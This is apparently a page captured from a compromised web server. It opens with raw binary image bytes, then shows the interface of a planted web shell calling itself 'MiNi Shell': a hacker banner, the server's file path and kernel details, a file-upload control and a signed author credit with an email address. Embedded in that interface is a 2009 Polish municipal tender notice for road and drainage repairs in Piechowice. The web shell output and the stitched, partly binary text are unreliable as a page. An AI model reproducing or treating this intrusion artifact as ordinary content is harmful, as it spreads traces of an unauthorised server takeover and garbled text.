JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090904/147891-N-2009.html

<p class="kh_header"><b>Piechowice: Remont części ulicy Kolonijnej, części ulicy Słonecznej, nawierzchni jezdni ulicy Kolejowej oraz części zabudowy regulacyjnej i ubezpieczeniowej cieku wodnego przy ulicy Zawadzkiego w Piechowicach. Znak postępowania: IZP/341/1/8/09</b><br>
<b>Numer ogłoszenia: 147891 - 2009; data zamieszczenia: 04.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piechowice , ul. Żymierskiego 49, 58-573 Piechowice, woj. dolnośląskie, tel. 075 7548900, faks 075 7612274.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://piechowice.bip.pbox.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont części ulicy Kolonijnej, części ulicy Słonecznej, nawierzchni jezdni ulicy Kolejowej oraz części zabudowy regulacyjnej i ubezpieczeniowej cieku wodnego przy ulicy Zawadzkiego w Piechowicach. Znak postępowania: IZP/341/1/8/09.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zadanie pn. Remont części ulicy Kolonijnej, części ulicy Słonecznej, nawierzchni jezdni ulicy Kolejowej oraz części zabudowy regulacyjnej i ubezpieczeniowej cieku wodnego przy ulicy Zawadzkiego w Piechowicach.

      CPV 45 23 31 20-6        Roboty w zakresie budowy dróg
        
2.	Zamówienie obejmuje wykonanie remontu infrastruktury drogowej oraz cieku wodnego uszkodzonych w wyniku klęski żywiołowej (opady deszczu i powódź) w czerwcu i lipcu 2009 r. tj.:

2.1	  Remont nawierzchni jezdni ulicy Kolejowej o długości 460,00 mb na odcinku od skrzyżowania z ulicą 1 Maja do skrzyżowania z ulicami Szkolną i Mickiewicza. Obecnie ulica Kolejowa posiada zniszczoną nawierzchnię  bitumiczną. Wzdłuż  ulicy Kolejowej znajdują się nowe chodniki z kostki brukowej betonowej w krawężnikach betonowych, wykonane w 2009 r. w ramach odrębnego zamówienia. Niniejsze zamówienie obejmuje wykonanie nowej nawierzchni jezdni z asfaltobetonu o szerokości od 4,80 do 5,80 m wraz z robotami towarzyszącymi. W ramach robót przygotowawczych należy wykonać frezowanie istniejącej nawierzchni, regulację pionową studzienek dla włazów kanałowych (9 szt.), ulicznych kratek ściekowych (4 szt.) zaworów wodociągowych i gazowych (5 szt.) z wymianą na nowe włazy i kratki ściekowe. Nawierzchnia jezdni - wyrównanie istniejącej podbudowy betonem asfaltowym, skropienie nawierzchni asfaltem, ułożenie warstwy ścieralnej z betonu asfaltowego o grubości 5 cm (po zagęszczeniu).

2.2	Remont nawierzchni odcinka (części) ulicy Słonecznej w Piechowicach,
 
OPIS  robót:
Długość remontowanego odcinka -230 m
Szerokość jezdni  zmienna  -3,00 - 3,50 m, szerokość poboczy 0.50 m
 
Wykonanie profilu jezdni przez frezowanie istniejącej nawierzchni w osi jezdni na głębokość od 0 do 6 cm w sposób umożliwiający uzyskanie 2% spadku poprzecznego jezdni.

Wykonanie  bitumicznej nawierzchni jezdni z warstw z betonu asfaltowego: 1) wyrównawczo- profilującej  z betonu asfaltowego 0/16 i warstwy ścieralnej z betonu  asfaltowego 0/12,8 o grub.4 cm. 
Wykonanie wzdłuż ulicy ścieku z prefabrykowanych elementów betonowych na ławie betonowej zbierającego wody opadowe z położonych wyżej terenów i nawierzchni jezdni z odprowadzeniem do istniejącego rowu.
Do wykonania zjazdy o nawierzchni bitumicznej z betonu asfaltowego.

Jednostronne wyprofilowanie  pobocza drogi  o szer.50 cm z tłucznia kamiennego
o grubości warstwy 10 cm po zagęszczeniu. (górna warstwa z tłucznia o frakcji 4 - 31,5 mm)
 
Regulacja pionowa  istniejących studzienek ściekowych i  udrożnienie istniejącego kanału deszczowego.

2.3	Remont nawierzchni odcinka (części) ulicy Kolonijnej w Piechowicach,
Łączna długość remontowanych odcinków - 132 m
Szerokość jezdni -zmienna- 3,00 - 5,.50 m

Opis robot:
Rozbiórka  zniszczonej nawierzchni  bitumicznej  wraz ze zniszczoną betonową podbudową, i fragmentów  zniszczonych  istniejących krawężników .(Krawężniki z rozbiórki  stanowić będą własność Inwestora)  
Ustawienie krawężników betonowych  15x30 cm  wzdłuż remontowanego odcinka   na ławie betonowej z oporem i  z obniżeniem na zjazdach.
Wykonanie nawierzchni z dwóch warstw : 1) z wykorzystanie istniejącej podbudowy po uprzednim jej wyrównaniu sortowanym tłuczniem kamiennym), średnia grubość warstwy po zagęszczeniu do 10 cm  2) Nawierzchnia z betonowej kostki brukowej  o grub.10  cm na podsypce cementowo piaskowej .
- Wykonanie zjazdów - z kostki betonowej  grub.10 cm na podsypce cementowo piaskowej.
- Odwodnienie nawierzchni przez ukształtowanie spadków  podłużnych i poprzecznych - Odprowadzenie wód opadowych  przez wykonanie   ścieku  z  prefabrykowanych elementów betonowych o grub.15 cm ułożonych na ławie betonowej wzdłuż remontowanej ulicy z odprowadzeniem  wód do istniejącej kanalizacji deszczowej poprzez wykonaną studnię wlotową i kanału z rur PCV 250mm w dolnym odcinku ulicy.
Regulacja pionowa istniejących  studzienek dla urządzeń podziemnych z wymianą włazów i kratek ściekowych na nowe. 
Roboty uzupełniające - remont cząstkowy  - naprawa  betonem asfaltowym  uszkodzonej  nawierzchni bitumicznej  z  uzupełnieniem  wzdłuż ścieków .


2.4	Remont zabudowy regulacyjnej i ubezpieczeniowej cieku wodnego przy ul. Zawadzkiego (część) na odcinku od ulicy Słonecznej do ulicy Zawadzkiego. 

Długość remontowanego odcinka rowu - 130 m

Opis robot:
Ręczne ścinanie i karczowanie średniej gęstości krzaków, mechaniczne  karczowanie pni szt.5   z  wywiezieniem gałęzi i karpiny na składowisko Wykonawcy.
-Oczyszczenie zamulonego rowu bez naruszania skarp rowu z ręcznym rozplantowaniem  wydobytej  ziemi .
-Odtworzenie zniszczonej obudowy kamiennej rowu z wykorzystaniem miejscowego materiału kamiennego (40 %) -  na zaprawie cementowej.  
-Oczyszczenie istniejącego przepustu  w ulicy Zawadzkiego z namułu na długości 10 m, wraz z wykonaniem wlotu i wylotu z kamienia łamanego na zaprawie cementowej  
-Wykonanie trzech wodospustów  o dług.8 m każdy,  z odprowadzeniem do remontowanego rowu - w formie ścieku z betonowych elementów prefabrykowanych grub.15 cm ułożonych na ławie z betonu B20 .



3.	Integralną częścią opisu przedmiotu zamówienia jest dokumentacja projektowa,  zgodnie z załącznikiem nr 7 do SIWZ, składająca się z następujących pozycji: 

3.1.Dokumentacja projektowa pn. Remont nawierzchni jezdni  i chodników    ulicy Kolejowej  w Piechowicach  - w zakresie  remontu nawierzchni  jezdni ulicy Kolejowej, ponieważ pozostałe prace przewidziane tą dokumentacją zostały już wykonane w ramach odrębnego zamówienia.
- Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (tzw. STWiORB) na Remont nawierzchni jezdni  i chodników    ulicy Kolejowej  w Piechowicach  - w zakresie  remontu nawierzchni  jezdni ulicy Kolejowej, ponieważ pozostałe prace przewidziane tą dokumentacją zostały już wykonane w ramach odrębnego zamówienia.

3.2.Dokumentacja projektowa pn. Remont nawierzchni odcinka ulicy Słonecznej w Piechowicach,
-	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (tzw. STWiORB) na Remont nawierzchni ulicy Słonecznej w Piechowicach

3.3. Dokumentacja projektowa pn. Remont nawierzchni odcinka ulicy Kolonijnej w Piechowicach,
-	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (tzw. STWiORB) na Remont nawierzchni ulicy Kolonijnej w Piechowicach,

3.4. Dokumentacja projektowa pn. Remont zabudowy kamiennej rowu odwadniającego między ulicą Słoneczną a ulicą Zawadzkiego w Piechowicach,
-	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (tzw. STWiORB) na Remont zabudowy kamiennej rowu odwadniającego między ulicą Słoneczną a ulicą Zawadzkiego w Piechowicach,

4. Wymagany okres gwarancji:
- na wykonane roboty ( materiały i robociznę) wynosi 36 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.
5. W szczególności Wykonawca w  cenie oferty (zapewni i pokryje koszty):
-	zapewni obsługę geodezyjną w zakresie niezbędnym do prawidłowego wykonania robót oraz ich odbioru w formie operatu kolaudacyjnego, pomiarów powykonawczych w zakresie uzgodnionym z Inspektorem nadzoru inwestorskiego (dokumentacja powykonawcza w 2 egz.), 
-	zorganizuje i utrzyma plac budowy w czasie prowadzenia robót,
-	wykona i zatwierdzi projekt organizacji ruchu zastępczego na czas robót,
-	zapewni i pokryje koszty nadzoru ze strony innych instytucji branżowych np. właścicieli i zarządców sieci uzbrojenia podziemnego i naziemnego tj. kanalizacja sanitarna i deszczowa, sieć wodociągowa, gazowa teletechniczna i energetyczna..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 5.000,00 zł (słownie złotych: pięć tysięcy  złotych).
2.	Forma wadium.
1)	Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
   a) pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).
2)	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej) udzielającej gwarancji) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją, 
c)	kwotę gwarancji,
d)  termin ważności gwarancji,
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne 
               żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca w odpowiedzi na 
               wezwanie, o którym mowa w art. 26 ust.3 ustawy PZP, nie złożył dokumentów lub 
               oświadczeń, o których mowa w art. 25 ust.1 ustawy PZP, lub pełnomocnictw,
f)	zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: 
-	odmówił podpisania umowy na warunkach określonych w ofercie, lub
-	nie wniósł zabezpieczenia należytego wykonania umowy, lub
-	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.

    3) Postanowienia podpunktu 2) stosuje się odpowiednio do poręczeń, określonych powyżej 
          w podpunktach: 1) b) oraz 1) e).
 
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelewem  na rachunek bankowy Zamawiającego:
Bank Gospodarki Żywnościowej S.A.       Oddział w Jeleniej Górze   
               Nr 65 2030 0045 1110 0000 0080 3550
z podaniem tytułu: dotyczy przetargu na Remont części ulicy Kolonijnej, części ulicy Słonecznej, nawierzchni jezdni ulicy Kolejowej oraz części zabudowy regulacyjnej i ubezpieczeniowej cieku wodnego przy ulicy Zawadzkiego w Piechowicach IZP/341/1/8/09.
5.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego. 
6.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał takiego dokumentu należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego w  pok. 11 (Referat Finansowy I piętro). Jeżeli Wykonawca prześle ofertę pocztą winien kopię dowodu wniesienia wadium załączyć do oferty, natomiast oryginał dokumentu wadialnego umieścić w odrębnej kopercie oznaczonej oryginał dowodu wniesienia wadium.
7.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.
8.	Zamawiający zwraca  niezwłocznie wadium, jeżeli:
a)	upłynął termin związania ofertą,
b)	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
c)	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
9.	Za zastrzeżeniem, punktu 9.1 Zamawiający zwróci niezwłocznie wadium na pisemny wniosek Wykonawcy:
a)	który wycofał ofertę przed upływem terminu składania ofert,
b)	który został wykluczony z postępowania,
c)	którego oferta została odrzucona.
9.1. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy PZP, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1,  lub pełnomocnictw, chyba, że udowodni, iż wynika to z przyczyn nie leżących po jego stronie.
      
         UWAGA: W przypadku złożenia wadium w formie gwarancji lub poręczenia, dokument ten winien zawierać klauzulę gwarancji zapłaty wymaganej kwoty wadium po zaistnieniu w/w okoliczności.

10.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na ich wniosek w wyniku wykluczenia ich z postępowania lub odrzucenia ich oferty, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia Wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
11.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
12.	Na pisemny wniosek Wykonawcy, którego oferta została wybrana, wadium wraz z odsetkami wniesione w pieniądzu, zaliczane jest przez Zamawiającego na poczet zabezpieczenia należytego wykonania umowy.
13.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	omówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
14.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy PZP, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1,  lub pełnomocnictw, chyba, że udowodni, iż wynika to z przyczyn nie leżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art. 22 ust. 1 ustawy z dnia 29.01.2009 r. Prawo zamówień publicznych (tekst jednolity z 2007 roku Dz.U. nr 223, poz. 1655 ze zm) zwaną dalej ustawą lub Pzp, tj:

1.1.	posiadają uprawnienia do wykonywania określonej w przedmiocie zamówienia działalności  lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

1.2.	posiadają niezbędną wiedzę i doświadczenie zawodowe oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego  i osób zdolnych do wykonania zamówienia tj.:
a)	wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia,    a jeżeli okres działalności jest krótszy to w tym okresie,  min. 2 dwa zadania o wartości brutto 100.000,00 zł, każde zadanie  w zakresie budowy, przebudowy, odbudowy, remontu  dróg; odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia - z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów  ( np. referencje) potwierdzających, że roboty te zostały wykonane należycie;
b)	dysponują lub będą dysponowali min. jedną osobą, która będzie uczestniczyć w wykonaniu zamówienia i która posiada kwalifikacje niezbędne do wykonania zamówienia tj. posiada uprawnienia do wykonywania samodzielnych funkcji kierownika budowy dróg i mogąca  wykazać się decyzją o przygotowaniu zawodowym do pełnienia samodzielnych funkcji technicznych w budownictwie oraz przynależnością do  właściwej Izby Samorządu Zawodowego. 
1.3.  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
           zamówienia,           
1.4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

a także
1.5.	zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust. 1 pkt.  2, ust. 2 pkt. 1,  5, 5a, 6  Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału  w postępowaniu  o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy (Dz.U. Nr 87/2006, poz. 605 z póź. zm.) 
1.6.	oświadczą, że spełniają warunki określone w art. 22 ust. 1 PZP oraz, że nie podlegają wykluczeniu z postępowania na podstawie art. 24 PZP,
2. Sprawdzenie spełnienia w/w warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 2 oraz Załącznik Nr 3 do niniejszej SIWZ.

1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust.1 ustawy do oferty dołączyć należy:

1)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2.	W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia do oferty dołączyć należy:

1) Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęciem postępowania o udzielenie zamówienia, tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością  robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, daty i miejsca wykonania oraz załączeniem dokumentów od poprzednich Zamawiających potwierdzających, że roboty te zostały wykonane należycie (np.referencje, protokoły odbioru, itp.) Wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 4  do  SIWZ,
2)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności - wg. Załącznika nr 5 do SIWZ. 
3)	pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w punkcie powyżej, Wykonawca wskazał osoby, którymi będzie dysponował, 
4)	dokumenty potwierdzające, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają, wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - tj. uprawnienia budowlane do kierowania robotami budowlanymi przez wskazane osoby w zakresie budowy dróg oraz aktualne zaświadczenie właściwej izby samorządu zawodowego (Okręgowa Izba Inżynierów Budownictwa) potwierdzające przynależność wskazanej osoby do tej izby..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://piechowice.bip.pbox.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego: Urząd Miasta Piechowice, 58-573 Piechowice, ul.Żymierskiego 49, pok. nr 15 II piętro. Opłata za 1 kpl SIWZ - 24,99 zł (koszt druku)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2009 godzina 10:00, miejsce: siedziba Zamawiającego: Urząd Miasta Piechowice, 58-573 Piechowice, ul.Żymierskiego 49, pok. nr 6 sekretariat I piętro..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com